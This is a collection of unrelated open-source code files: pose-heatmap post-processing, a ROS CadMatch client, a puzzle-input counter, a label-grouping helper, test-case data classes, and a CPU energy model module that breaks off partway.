dxy = 0.5 * (ix1y1 - ix1 - iy1 + i_ + i_ - ix1_ - iy1_ + ix1_y1_)
hessian = np.concatenate([dxx, dxy, dxy, dyy], axis=1)
hessian = hessian.reshape(N, K, 2, 2)
hessian = np.linalg.inv(hessian + np.finfo(np.float32).eps * np.eye(2))
coords -= np.einsum("ijmn,ijnk->ijmk", hessian, derivative).squeeze()
return coords
def _gaussian_blur(heatmaps, kernel=11):
"""Modulate heatmap distribution with Gaussian.
sigma = 0.3*((kernel_size-1)*0.5-1)+0.8
sigma~=3 if k=17
sigma=2 if k=11;
sigma~=1.5 if k=7;
sigma~=1 if k=3;
Note:
batch_size: N
num_keypoints: K
heatmap height: H
heatmap width: W
Args:
heatmaps (np.ndarray[N, K, H, W]): model predicted heatmaps.
kernel (int): Gaussian kernel size (K) for modulation, which should
match the heatmap gaussian sigma when training.
            k=17 for sigma=3 and k=11 for sigma=2.
Returns:
np.ndarray[N, K, H, W]: Modulated heatmap distribution.
"""
assert kernel % 2 == 1
border = (kernel - 1) // 2
batch_size = heatmaps.shape[0]
num_joints = heatmaps.shape[1]
height = heatmaps.shape[2]
width = heatmaps.shape[3]
for i in range(batch_size):
for j in range(num_joints):
origin_max = np.max(heatmaps[i, j])
dr = np.zeros((height + 2 * border, width +
2 * border), dtype=np.float32)
dr[border:-border, border:-border] = heatmaps[i, j].copy()
dr = cv2.GaussianBlur(dr, (kernel, kernel), 0)
heatmaps[i, j] = dr[border:-border, border:-border].copy()
heatmaps[i, j] *= origin_max / np.max(heatmaps[i, j])
return heatmaps
def _get_max_preds_tensor(heatmaps):
assert isinstance(
heatmaps, torch.Tensor), "heatmaps should be torch.tensor for onnx export"
assert heatmaps.ndim == 4, "batch_images should be 4-ndim"
N, K, _, W = heatmaps.shape
heatmaps_reshaped = heatmaps.reshape((N, K, -1))
maxvals, idx = torch.max(heatmaps_reshaped, dim=2)
maxvals = maxvals.unsqueeze(-1)
idx = idx.unsqueeze(-1)
idx_repeated = idx.repeat(1, 1, 2).to(torch.float32)
preds = idx_repeated.clone()
preds[:, :, 0] = preds[:, :, 0] % W
preds[:, :, 1] = preds[:, :, 1] // W
a = idx_repeated > 0.0
preds = torch.where(a, preds, torch.tensor(-1.0).to(torch.float32))
return preds, maxvals
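# Hedged usage sketch (illustration only, not part of the original module): decode
# the peak of each random heatmap and refine it with DARK/UDP. Assumes torch,
# numpy (np) and cv2 are imported at the top of this file, as the functions above
# already require.
if __name__ == "__main__":
    _heatmaps = torch.rand(2, 17, 64, 48)  # N=2 persons, K=17 joints, H=64, W=48
    _preds, _maxvals = _get_max_preds_tensor(_heatmaps)
    _refined = post_dark_udp(_preds.numpy(), _heatmaps.numpy(), kernel=11)
    print(_refined.shape, _maxvals.shape)  # (2, 17, 2) and torch.Size([2, 17, 1])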
|
the-stack_106_22064
|
#!/usr/bin/env python
# Copyright 2021 Roboception GmbH
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of the {copyright_holder} nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import absolute_import
import rospy
from math import sqrt
from tf2_msgs.msg import TFMessage
from geometry_msgs.msg import TransformStamped, Quaternion
from rc_reason_msgs.srv import CadMatchDetectObject
from visualization_msgs.msg import Marker, MarkerArray
from std_msgs.msg import ColorRGBA
from .rest_client import RestClient
from .transform_helpers import lc_to_marker, load_carrier_to_tf, match_to_tf
class CadMatchClient(RestClient):
def __init__(self):
ignored_parameters = ['load_carrier_crop_distance', 'load_carrier_model_tolerance']
super(CadMatchClient, self).__init__('rc_cadmatch', ignored_parameters)
# client only parameters
self.publish_tf = rospy.get_param("~publish_tf", True)
self.publish_markers = rospy.get_param("~publish_markers", True)
self.pub_tf = rospy.Publisher('/tf', TFMessage, queue_size=10)
self.pub_markers = rospy.Publisher('visualization_marker_array', MarkerArray, queue_size=10)
self.lc_markers = []
self.add_rest_service(CadMatchDetectObject, 'detect_object', self.detect_cb)
rospy.on_shutdown(self.stop)
self.start()
def start(self):
rospy.loginfo("starting %s", self.rest_name)
self.call_rest_service('start')
def stop(self):
rospy.loginfo("stopping %s", self.rest_name)
self.call_rest_service('stop')
def detect_cb(self, srv_name, srv_type, request):
response = self.call_rest_service(srv_name, srv_type, request)
self.pub_matches(response.matches)
self.publish_lcs(response.load_carriers)
return response
def pub_matches(self, matches):
if not matches or not self.publish_tf:
return
transforms = [match_to_tf(i) for i in matches]
self.pub_tf.publish(TFMessage(transforms=transforms))
def publish_lcs(self, lcs):
if lcs and self.publish_tf:
transforms = [load_carrier_to_tf(lc, i) for i, lc in enumerate(lcs)]
self.pub_tf.publish(TFMessage(transforms=transforms))
if self.publish_markers:
self.publish_lc_markers(lcs)
def publish_lc_markers(self, lcs):
new_markers = []
for i, lc in enumerate(lcs):
m = lc_to_marker(lc, i, self.rest_name + "_lcs")
if i < len(self.lc_markers):
self.lc_markers[i] = m
else:
self.lc_markers.append(m)
new_markers.append(m)
for i in range(len(lcs), len(self.lc_markers)):
# delete old markers
self.lc_markers[i].action = Marker.DELETE
self.pub_markers.publish(MarkerArray(markers=self.lc_markers))
self.lc_markers = new_markers
def main():
client = CadMatchClient()
try:
rospy.spin()
except KeyboardInterrupt:
pass
if __name__ == '__main__':
main()
|
the-stack_106_22068
|
def load_input():
cases = open("input.txt", "r").readlines()
for i in range(len(cases)):
cases[i] = cases[i].replace('\n','')
return cases
groups = []
def parse_input():
inp = load_input()
inp_len = len(inp)
group = []
for i in range(inp_len):
line = inp[i]
if line == '' and len(group) != 0:
groups.append(group)
group = []
elif len(line) != 0:
group.append(line)
if len(group) != 0:
groups.append(group)
def count_group(group):
answer_set = set()
group_len = len(group)
for i in range(group_len):
answer_set.update(group[i])
return len(answer_set)
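# Worked example (illustration only): for the group ["abc", "acd"] the union of
# answered questions is {a, b, c, d}, so count_group(["abc", "acd"]) == 4.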
parse_input()
sum_count = 0
for i in range(len(groups)):
sum_count += count_group(groups[i])
print(sum_count)
# print(groups)
|
the-stack_106_22069
|
import logging
import collections
import numpy as np
logger = logging.getLogger(__name__)
LabelGrouping = collections.namedtuple('LabelGrouping',
['title', 'Y', 'Y_labels', ])
DataSplit = collections.namedtuple('DataSplit',
[ 'X_train', 'X_test', 'Y_train', 'Y_test'])
def group_labels(Y, target_names, label_group_dict):
""" Create a grouping between the labels i.e. map several labels
to the same value.
Expects a grouping dict with all labels, of the form e.g.
{0: ['job', 'time frame'],
1: ['further information',
'contact information']
...
}
The keys of the dictionary can also be strings which results in a
renaming of the group instead of a concatenation of the names.
"""
new_column_arrays = []
new_labels = []
for key, labels in label_group_dict.items():
# if a new name was given for the label group then use that
if type(key) == str:
new_labels.append(key)
        # otherwise use the stringified list of labels for that group
else:
new_labels.append(str(labels))
label_ids = []
# collect id's for labels to be joined
for label in labels:
try:
label_ids.append(target_names.index(label))
except ValueError:
logger.debug("Label '" + label + "' not found in labels, "+
"skipping.")
# create new label by taking the max from all labels to be joined
try:
new_column_arrays.append(Y[:,label_ids].max(axis=1, keepdims=True))
except (ValueError, IndexError):
# No labels found in this label group, skip this group
pass
return (np.hstack(new_column_arrays), new_labels)
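# Hedged usage sketch (illustration only, not called anywhere): collapse four
# labels into two named groups. Label names and data are made up; the column
# order of the result follows the iteration order of the grouping dict.
def _example_group_labels():
    Y = np.array([[1, 0, 0, 0],
                  [0, 0, 1, 0]])
    target_names = ['job', 'time frame',
                    'further information', 'contact information']
    grouped_Y, grouped_names = group_labels(
        Y, target_names,
        {'when': ['job', 'time frame'],
         'info': ['further information', 'contact information']})
    # grouped_Y == [[1, 0], [0, 1]] and grouped_names == ['when', 'info']
    return grouped_Y, grouped_names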
def make_grouping(cluster_predictions, target_names):
    """Group label names by the cluster index predicted for each label."""
    clustered_tags = {}
    for i, label in enumerate(target_names):
        cluster_idx = int(cluster_predictions[i])
        try:
            clustered_tags[cluster_idx].append(label)
        except KeyError:
            clustered_tags[cluster_idx] = [label]
    return clustered_tags
|
the-stack_106_22070
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2021/1/23 18:48
# @Author : Charseki.Chen
# @Email : [email protected]
# @Site : https://www.chenshengkai.com
# @File : datatype.py
# @Software: PyCharm
class TestSuite():
sub_suites = None
name = ""
details = ""
testcase_list = None
def to_dict(self):
me = {'name': self.name,
'details': self.details,
'testcase_list': [],
'sub_suites': []}
if self.sub_suites:
for s in self.sub_suites:
me['sub_suites'].append(s.to_dict())
if self.testcase_list:
for t in self.testcase_list:
me['testcase_list'].append(t.to_dict())
return me
class TestCase():
name = ""
summary = ""
preconditions = ""
importance = 2
execution_type = 1
steps = None
def to_dict(self):
me = {'name': self.name,
'summary': self.summary,
'preconditions': self.preconditions,
'importance': self.importance or 2,
'execution_type': self.execution_type,
'steps': []}
if self.steps:
for s in self.steps:
me['steps'].append(s.to_dict())
return me
class TestStep():
number = 1
action = ""
expected = ""
execution_type = 1
def to_dict(self):
me = {'number': self.number,
'action': self.action,
'expected': self.expected,
'execution_type': self.execution_type}
return me
cache = {}
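# Hedged usage sketch (illustration only): build a one-step, one-case suite and
# dump it to the nested dict structure produced by to_dict().
if __name__ == "__main__":
    step = TestStep()
    step.action = "Open the login page"
    step.expected = "The login form is shown"
    case = TestCase()
    case.name = "Login smoke test"
    case.steps = [step]
    suite = TestSuite()
    suite.name = "Smoke"
    suite.testcase_list = [case]
    print(suite.to_dict())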
|
the-stack_106_22072
|
# SPDX-License-Identifier: Apache-2.0
#
# Copyright (C) 2016, ARM Limited and contributors.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import namedtuple, OrderedDict
from itertools import product
import logging
import operator
import re
import pandas as pd
import numpy as np
from devlib.utils.misc import memoized, mask_to_list
from devlib import TargetError
"""Classes for modeling and estimating energy usage of CPU systems"""
def read_multiple_oneline_files(target, glob_patterns):
"""
Quickly read many single-line files that match a glob pattern
Finds all the files that match any of the glob patterns and, assuming that
they each contain exactly 1 line of text, read them all at once. When the
target or connection is slow this saves a lot of time when reading a large
number of files.
This will only work safely on stationary files, don't try to use it where
the glob expansion will change often - for example /proc/**/autogroup would
not work because /proc/ entries will likely appear & disappear while we're
reading them.
:param target: devlib target object to read from
:param glob_pattern: Unix glob pattern matching the files to read
:returns: A dictionary mapping matched paths to the values read. ``{}`` if
no paths matched the globs.
"""
find_cmd = 'find ' + ' '.join(glob_patterns)
try:
paths = target.execute(find_cmd).split()
except TargetError:
return {}
cmd = '{} | {} xargs cat'.format(find_cmd, target.busybox)
contents = target.execute(cmd).splitlines()
if len(contents) != len(paths):
raise RuntimeError('File count mismatch while reading multiple files')
return dict(zip(paths, contents))
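# Hedged usage sketch (illustration only): read the scaling governor of every CPU
# in a single round trip, using the standard cpufreq sysfs location.
#
#   governors = read_multiple_oneline_files(
#       target, ['/sys/devices/system/cpu/cpu*/cpufreq/scaling_governor'])
#   # e.g. {'/sys/devices/system/cpu/cpu0/cpufreq/scaling_governor': 'schedutil', ...}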
class EnergyModelCapacityError(Exception):
"""Used by :meth:`EnergyModel.get_optimal_placements`"""
pass
class ActiveState(namedtuple('ActiveState', ['capacity', 'power'])):
"""Represents power and compute capacity at a given frequency
:param capacity: Relative compute capacity at frequency
:param power: Power usage at frequency
"""
def __new__(cls, capacity=None, power=None):
return super(ActiveState, cls).__new__(cls, capacity, power)
class _CpuTree(object):
"""Internal class. Abstract representation of a CPU topology.
Each node contains either a single CPU or a set of child nodes.
"""
def __init__(self, cpu, children):
if (cpu is None) == (children is None):
raise ValueError('Provide exactly one of: cpu or children')
self.parent = None
self.cpu = cpu
if cpu is not None:
self.cpus = (cpu,)
self.children = []
else:
if len(children) == 0:
raise ValueError('children cannot be empty')
self.cpus = tuple(sorted(set().union(*[n.cpus for n in children])))
self.children = children
for child in children:
child.parent = self
self.name = None
def __repr__(self):
name_bit = ''
if self.name:
name_bit = 'name="{}", '.format(self.name)
if self.children:
return '{}({}children={})'.format(
self.__class__.__name__, name_bit, self.children)
else:
return '{}({}cpus={})'.format(
self.__class__.__name__, name_bit, self.cpus)
def _iter(self, include_non_leaves):
for child in self.children:
for child_i in child._iter(include_non_leaves):
yield child_i
if include_non_leaves or not self.children:
yield self
def iter_nodes(self):
"""Iterate over nodes depth-first, post-order"""
return self._iter(True)
def iter_leaves(self):
"""Iterate over leaves"""
return self._iter(False)
class EnergyModelNode(_CpuTree):
"""Describes topology and energy data for an EnergyModel.
Represents a CPU topology with energy data. The active and idle state data
represents the power usage of just the hardware resources of this topology
level, not its children. e.g. If the node represents a cluster, the power
numbers should not include power used by the CPU - that power should be
included the data of the child nodes.
Exactly one of ``cpu`` and ``children`` must be given.
:param active_states: Dict mapping frequencies to :class:`ActiveState`
values. Compute capacity data is optional for
non-leaf nodes.
:param idle_states: Dict mapping idle state names to power usage values
:param cpu: The CPU this node represents. If provided, this is a leaf node.
:type cpus: tuple(int)
:param children: Non-empty list of child :class:`EnergyModelNode` objects
:param name: Optional human-readable name for this node. Leaf (CPU) nodes
have a default name of "cpuN" where N is the cpu number.
:ivar cpus: CPUs contained in this node. Includes those of child nodes.
:ivar cpu: For convenience, this holds the single CPU contained by leaf
nodes. ``None`` for non-leaf nodes.
"""
def __init__(self, active_states, idle_states,
cpu=None, children=None, name=None):
super(EnergyModelNode, self).__init__(cpu, children)
self._log = logging.getLogger('EnergyModel')
def is_monotonic(l, decreasing=False):
op = operator.ge if decreasing else operator.le
return all(op(a, b) for a, b in zip(l, l[1:]))
if active_states:
# Sanity check for active_states's frequencies
freqs = active_states.keys()
if not is_monotonic(freqs):
self._log.warning(
'Active states frequencies are expected to be '
'monotonically increasing. Freqs: {}'.format(freqs))
# Sanity check for active_states's powers
power_vals = [s.power for s in active_states.values()]
if not is_monotonic(power_vals):
self._log.warning(
'Active states powers are expected to be '
'monotonically increasing. Values: {}'.format(power_vals))
# Sanity check for idle_states powers
if idle_states:
power_vals = idle_states.values()
if not is_monotonic(power_vals, decreasing=True):
self._log.warning(
'Idle states powers are expected to be '
'monotonically decreasing. Values: {}'.format(power_vals))
if cpu is not None and not name:
name = 'cpu' + str(cpu)
self.name = name
self.active_states = active_states
self.idle_states = idle_states
@property
def max_capacity(self):
"""Compute capacity at highest frequency"""
return max(s.capacity for s in self.active_states.values())
class EnergyModelRoot(EnergyModelNode):
"""
Convenience class for root of an EnergyModelNode tree.
Just like EnergyModelNode except that ``active_states`` and ``idle_states``
aren't required.
"""
def __init__(self, active_states=None, idle_states=None,
cpu=None, children=None, name=None):
return super(EnergyModelRoot, self).__init__(
active_states, idle_states, cpu, children, name)
class PowerDomain(_CpuTree):
"""Describes the power domain hierarchy for an EnergyModel.
Power domains are a description of the topological dependencies in hardware
for entering idle states. "Composite" states such as cluster-sleep states
require a set of CPUs to all be idle before that state can be entered. In
that case those CPUs can be grouped into a power domain, and that composite
state attached to the power domain. Note that cpuidle is not aware of these
dependencies; they are typically handled by the platform firmware.
Exactly one of ``cpu`` and ``children`` must be given. That is, leaves of
the PowerDomain tree always contain exactly one CPU - each CPU is
represented as being in a power domain of its own. This represents the
assumption that all CPUs have at least one idle state (such as ARM WFI) that
they can enter independently of other CPUs.
:param idle_states: List of names of idle states for this power domain. Does
not store power data - these names are used as keys into
the ``idle_states`` field of :class:`EnergyModelNode`
objects.
:type idle_states: list(str)
:param cpu: The CPU this node represents. If provided, this is a leaf node.
:type cpu: int
:param children: Non-empty list of child :class:`PowerDomain` objects
:type children: list(PowerDomain)
:ivar cpus: CPUs contained in this node. Includes those of child nodes.
:type cpus: tuple(int)
"""
def __init__(self, idle_states, cpu=None, children=None):
if idle_states is None:
raise ValueError('idle_states cannot be None (but may be empty)')
super(PowerDomain, self).__init__(cpu, children)
self.idle_states = idle_states
class EnergyModel(object):
"""Represents hierarchical CPU topology with power and capacity data
An energy model consists of
- A CPU topology, representing the physical (cache/interconnect) topology of
the CPUs. Each node stores the energy usage of that node's hardware when
it is in each active or idle state. They also store a compute capacity at
each frequency, but this is only meaningful for leaf nodes (CPUs) and may
be None at higher levels. These capacity values are relative; the maximum
capacity would usually be 1024, the value of SCHED_CAPACITY_SCALE in the
Linux kernel scheduler. Use EnergyModelNodes to describe this.
- A power domain topology, representing the hierarchy of areas that can be
powered down (idled).
The power domains are a single tree. Leaf nodes must contain exactly one
CPU and the root node must indirectly contain every CPU. Each power domain
has a list (maybe empty) of names of idle states that that domain can
enter.
Use PowerDomains to describe this.
- A set of frequency domains, representing groups of CPUs whose clock
frequencies must be equal (probably because they share a clock). The
frequency domains must be a partition of the CPUs.
:ivar cpu_nodes: List of leaf (CPU) :class:`EnergyModelNode`
:ivar cpus: List of logical CPU numbers in the system
:param root_node: Root of :class:`EnergyModelNode` tree
:param root_power_domain: Root of :class:`PowerDomain` tree
:param freq_domains: Collection of collections of logical CPU numbers
representing frequency (clock) domains.
.. note::
        The most significant shortcomings of the model are:
1. Voltage domains are assumed to be congruent to frequency domains
2. Idle state power is assumed to be independent of voltage
3. Temperature is ignored entirely
.. _cpu-utils:
.. admonition:: ``cpu_utils``: CPU util distributions
Used throughout this module: A ``cpu_utils`` is a list ``u`` where
``u[N]`` is the sum of the frequency-invariant, capacity-invariant
utilization of tasks placed on CPU N. That is, the quantity represented
by a CPU runqueue's util_avg in the Linux kernel scheduler's
load-tracking system with EAS features enabled.
The range of utilization values is 0 -
:attr:`EnergyModel.capacity_scale`.
This represents a static utilization, assuming that tasks don't change
in size (for example representing a set of fixed periodic RT-App
workloads). For workloads that change over time, a series of
``cpu_utils`` items would be needed to describe the utilization, with a
distinct estimation for each item in the series.
"""
capacity_scale = 1024
"""The relative computational capacity of the most powerful CPU at its
highest available frequency.
"""
def __init__(self, root_node, root_power_domain, freq_domains):
self.cpus = root_node.cpus
if self.cpus != tuple(range(len(self.cpus))):
raise ValueError('CPU IDs [{}] are sparse'.format(self.cpus))
# Check that freq_domains is a partition of the CPUs
fd_intersection = set().intersection(*freq_domains)
if fd_intersection:
raise ValueError('CPUs {} exist in multiple freq domains'.format(
fd_intersection))
fd_difference = set(self.cpus) - set().union(*freq_domains)
if fd_difference:
raise ValueError('CPUs {} not in any frequency domain'.format(
fd_difference))
self.freq_domains = freq_domains
# Check that nodes with energy data are all within a frequency domain
for node in root_node.iter_nodes():
            if not node.active_states or not node.idle_states:
continue
cpu_freq_doms = []
for cpu in node.cpus:
[cpu_freq_dom] = [d for d in freq_domains if cpu in d]
cpu_freq_doms.append(cpu_freq_dom)
if not all(d == cpu_freq_doms[0] for d in cpu_freq_doms[1:]):
raise ValueError(
'Node {} (CPUs {}) '
'has energy data and overlaps freq domains'.format(
node.name, node.cpus))
def sorted_leaves(root):
# Get a list of the leaf (cpu) nodes of a _CpuTree in order of the
# CPU ID
ret = sorted(list(root.iter_leaves()), key=lambda n: n.cpus[0])
assert all(len(n.cpus) == 1 for n in ret)
return ret
self.root = root_node
self.cpu_nodes = sorted_leaves(root_node)
self.cpu_pds = sorted_leaves(root_power_domain)
assert len(self.cpu_pds) == len(self.cpu_nodes)
self._log = logging.getLogger('EnergyModel')
max_cap = max(n.max_capacity for n in self.cpu_nodes)
if max_cap != self.capacity_scale:
self._log.debug(
'Unusual max capacity (%s), overriding capacity_scale', max_cap)
self.capacity_scale = max_cap
def _cpus_with_capacity(self, cap):
"""
Helper method to find the CPUs whose max capacity equals cap
"""
return [c for c in self.cpus
if self.cpu_nodes[c].max_capacity == cap]
@property
@memoized
def biggest_cpus(self):
"""
The CPUs with the highest compute capacity at their highest frequency
"""
return self._cpus_with_capacity(self.capacity_scale)
@property
@memoized
def littlest_cpus(self):
"""
The CPUs with the lowest compute capacity at their highest frequency
"""
min_cap = min(n.max_capacity for n in self.cpu_nodes)
return self._cpus_with_capacity(min_cap)
@property
@memoized
def is_heterogeneous(self):
"""
True iff CPUs do not all have the same efficiency and OPP range
"""
states = self.cpu_nodes[0].active_states
return any(c.active_states != states for c in self.cpu_nodes[1:])
@property
@memoized
def cpu_groups(self):
"""
List of lists of CPUs who share the same active state values
"""
groups = []
for node in self.cpu_nodes:
for group in groups:
group_states = self.cpu_nodes[group[0]].active_states
if node.active_states == group_states:
group.append(node.cpu)
break
else:
groups.append([node.cpu])
return groups
def _guess_idle_states(self, cpus_active):
def find_deepest(pd):
if not any(cpus_active[c] for c in pd.cpus):
if pd.parent:
parent_state = find_deepest(pd.parent)
if parent_state:
return parent_state
return pd.idle_states[-1] if len(pd.idle_states) else None
return None
return [find_deepest(pd) for pd in self.cpu_pds]
def get_cpu_capacity(self, cpu, freq=None):
"""Convenience method to get the capacity of a CPU at a given frequency
:param cpu: CPU to get capacity for
:param freq: Frequency to get the CPU capacity at. Default is max
capacity.
"""
if freq is None:
return self.cpu_nodes[cpu].max_capacity
return self.cpu_nodes[cpu].active_states[freq].capacity
def guess_idle_states(self, cpus_active):
"""Pessimistically guess the idle states that each CPU may enter
If a CPU has any tasks it is estimated that it may only enter its
shallowest idle state in between task activations. If all the CPUs
within a power domain have no tasks, they will all be judged able to
enter that domain's deepest idle state. If any CPU in a domain has work,
no CPUs in that domain are assumed to enter any domain shared state.
e.g. Consider a system with
- two power domains PD0 and PD1
- 4 CPUs, with CPUs [0, 1] in PD0 and CPUs [2, 3] in PD1
- 4 idle states: "WFI", "cpu-sleep", "cluster-sleep-0" and
"cluster-sleep-1", where the "cluster-sleep-*" states domain states,
i.e. a CPU can only enter those states when both CPUs in the domain
are idle.
Then here are some example inputs and outputs:
::
# All CPUs idle:
[0, 0, 0, 0] -> ["cluster-sleep-1", "cluster-sleep-1",
"cluster-sleep-1", "cluster-sleep-1"]
# All CPUs have work
[1, 1, 1, 1] -> ["WFI","WFI","WFI", "WFI"]
# One power domain active, the other idle
[0, 0, 1, 1] -> ["cluster-sleep-1", "cluster-sleep-1", "WFI","WFI"]
# One CPU active.
# Note that CPU 2 has no work but is assumed to never be able to enter
# any "cluster" state.
[0, 0, 0, 1] -> ["cluster-sleep-1", "cluster-sleep-1",
"cpu-sleep","WFI"]
:param cpus_active: list where bool(cpus_active[N]) is False iff no
tasks will run on CPU N.
:returns: List ``ret`` where ``ret[N]`` is the name of the estimated
idle state that CPU N can enter during idle periods.
"""
states = self._guess_idle_states(cpus_active)
return [s or c.idle_states.keys()[0]
for s, c in zip(states, self.cpu_nodes)]
def _guess_freqs(self, cpu_utils):
overutilized = False
# Find what frequency each CPU would need if it was alone in its
# frequency domain
ideal_freqs = [0 for _ in self.cpus]
for node in self.cpu_nodes:
[cpu] = node.cpus
required_cap = cpu_utils[cpu]
possible_freqs = [f for f, s in node.active_states.iteritems()
if s.capacity >= required_cap]
if possible_freqs:
ideal_freqs[cpu] = min(possible_freqs)
else:
# CPU cannot provide required capacity, use max freq
ideal_freqs[cpu] = max(node.active_states.keys())
overutilized = True
# Rectify the frequencies among domains
freqs = [0 for _ in ideal_freqs]
for domain in self.freq_domains:
domain_freq = max(ideal_freqs[c] for c in domain)
for cpu in domain:
freqs[cpu] = domain_freq
return freqs, overutilized
def guess_freqs(self, cpu_utils):
"""Work out CPU frequencies required to execute a workload
Find the lowest possible frequency for each CPU that provides enough
capacity to satisfy the utilization, taking into account frequency
domains.
:param cpu_utils: Utilization distribution, see
:ref:`cpu_utils <cpu-utils>`
:returns: List ``ret`` where ``ret[N]`` is the frequency that CPU N must
run at
"""
freqs, _ = self._guess_freqs(cpu_utils)
return freqs
def _estimate_from_active_time(self, cpu_active_time, freqs, idle_states,
combine):
"""Helper for estimate_from_cpu_util
Like estimate_from_cpu_util but uses active time i.e. proportion of time
spent not-idle in the range 0.0 - 1.0.
If combine=False, return idle and active power as separate components.
"""
power = 0
ret = {}
assert all(0.0 <= a <= 1.0 for a in cpu_active_time)
for node in self.root.iter_nodes():
# Some nodes might not have energy model data, they could just be
# used to group other nodes (likely the root node, for example).
if not node.active_states or not node.idle_states:
continue
cpus = tuple(node.cpus)
# For now we assume topology nodes with energy models do not overlap
# with frequency domains
freq = freqs[cpus[0]]
assert all(freqs[c] == freq for c in cpus[1:])
# The active time of a node is estimated as the max of the active
# times of its children.
# This works great for the synthetic periodic workloads we use in
# LISA (where all threads wake up at the same time) but is probably
# no good for real workloads.
active_time = max(cpu_active_time[c] for c in cpus)
active_power = node.active_states[freq].power * active_time
_idle_power = max(node.idle_states[idle_states[c]] for c in cpus)
idle_power = _idle_power * (1 - active_time)
if combine:
ret[cpus] = active_power + idle_power
else:
ret[cpus] = {}
ret[cpus]["active"] = active_power
ret[cpus]["idle"] = idle_power
return ret
def estimate_from_cpu_util(self, cpu_utils, freqs=None, idle_states=None):
"""
Estimate the energy usage of the system under a utilization distribution
Optionally also take freqs; a list of frequencies at which each CPU is
assumed to run, and idle_states, the idle states that each CPU can enter
between activations. If not provided, they will be estimated assuming an
ideal selection system (i.e. perfect cpufreq & cpuidle governors).
:param cpu_utils: Utilization distribution, see
:ref:`cpu_utils <cpu-utils>`
:param freqs: List of CPU frequencies. Got from :meth:`guess_freqs` by
default.
        :param idle_states: List of CPU idle state names. Got from
                            :meth:`guess_idle_states` by default.
:returns: Dict with power in bogo-Watts (bW), with contributions from
each system component keyed with a tuple of the CPUs
comprising that component (i.e. :attr:EnergyModelNode.cpus)
::
{
(0,) : 10,
(1,) : 10,
(0, 1) : 5,
}
This represents CPUs 0 and 1 each using 10bW and their shared
resources using 5bW for a total of 25bW.
"""
if len(cpu_utils) != len(self.cpus):
raise ValueError(
'cpu_utils length ({}) must equal CPU count ({})'.format(
len(cpu_utils), len(self.cpus)))
if freqs is None:
freqs = self.guess_freqs(cpu_utils)
if idle_states is None:
idle_states = self.guess_idle_states(cpu_utils)
cpu_active_time = []
for cpu, node in enumerate(self.cpu_nodes):
assert (cpu,) == node.cpus
cap = node.active_states[freqs[cpu]].capacity
cpu_active_time.append(min(float(cpu_utils[cpu]) / cap, 1.0))
return self._estimate_from_active_time(cpu_active_time,
freqs, idle_states, combine=True)
def get_optimal_placements(self, capacities):
"""Find the optimal distribution of work for a set of tasks
Find a list of candidates which are estimated to be optimal in terms of
power consumption, but that do not result in any CPU becoming
over-utilized.
If no such candidates exist, i.e. the system being modeled cannot
satisfy the workload's throughput requirements, an
:class:`EnergyModelCapacityError` is raised. For example, if e was an
EnergyModel modeling two CPUs with capacity 1024, this error would be
raised by:
::
e.get_optimal_placements({"t1": 800, "t2": 800, "t3: "800"})
This estimation assumes an ideal system of selecting OPPs and idle
states for CPUs.
.. note::
This is a brute force search taking time exponential wrt. the number
of tasks.
:param capacities: Dict mapping tasks to expected utilization
values. These tasks are assumed not to change; they
have a single static utilization value. A set of
single-phase periodic RT-App tasks is an example of a
suitable workload for this model.
:returns: List of ``cpu_utils`` items representing distributions of work
under optimal task placements, see
:ref:`cpu_utils <cpu-utils>`. Multiple task placements
that result in the same CPU utilizations are considered
equivalent.
"""
tasks = capacities.keys()
num_candidates = len(self.cpus) ** len(tasks)
self._log.debug(
'%14s - Searching %d configurations for optimal task placement...',
'EnergyModel', num_candidates)
candidates = {}
excluded = []
for cpus in product(self.cpus, repeat=len(tasks)):
placement = {task: cpu for task, cpu in zip(tasks, cpus)}
util = [0 for _ in self.cpus]
for task, cpu in placement.items():
util[cpu] += capacities[task]
util = tuple(util)
# Filter out candidate placements that have tasks greater than max
# or that we have already determined that we cannot place.
if (any(u > self.capacity_scale for u in util) or util in excluded):
continue
if util not in candidates:
freqs, overutilized = self._guess_freqs(util)
if overutilized:
# This isn't a valid placement
excluded.append(util)
else:
power = self.estimate_from_cpu_util(util, freqs=freqs)
candidates[util] = sum(power.values())
if not candidates:
# The system can't provide full throughput to this workload.
raise EnergyModelCapacityError(
"Can't handle workload - total cap = {}".format(
sum(capacities.values())))
# Whittle down to those that give the lowest energy estimate
min_power = min(p for p in candidates.itervalues())
ret = [u for u, p in candidates.iteritems() if p == min_power]
self._log.debug('%14s - Done', 'EnergyModel')
return ret
@classmethod
def _find_core_groups(cls, target):
"""
Read the core_siblings masks for each CPU from sysfs
:param target: Devlib Target object to read masks from
:returns: A list of tuples of ints, representing the partition of core
siblings
"""
cpus = range(target.number_of_cpus)
topology_base = '/sys/devices/system/cpu/'
